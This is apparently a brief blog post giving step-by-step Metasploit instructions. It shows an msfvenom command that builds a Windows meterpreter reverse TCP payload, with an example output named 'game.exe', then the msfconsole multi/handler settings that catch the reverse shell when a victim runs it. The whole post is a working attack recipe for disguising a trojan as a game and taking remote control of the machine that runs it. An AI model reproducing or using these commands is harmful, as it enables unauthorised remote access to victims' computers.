Friday, July 24, 2020

MSFCONSOLE settings after Successfully Send Payload | metasploit

Payload Generate Command:

>>msfvenom  -p windows/meterpreter/reverse_tcp lhost=<your host ip>  lport=<port number>  -f  exe -o <paylaod name>

  • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.1 lport=8080 -f exe -o game.exe

msfconsole settings


    • >>>use multi/handler
    • >>>set payload -p windows/meterpreter/reverse_tcp
    • >>>set lhost <your host IP>
    • ex: set lhost 192.168.0.1
    • >>>set lport <set port what bind in the payload>
    • ex: set lport 8080
    • after verifying given values are correct 
    • >>>show options
    • Check Every Thing is Correct Execute below command
    • >>> exploit

Related Posts

0 comments: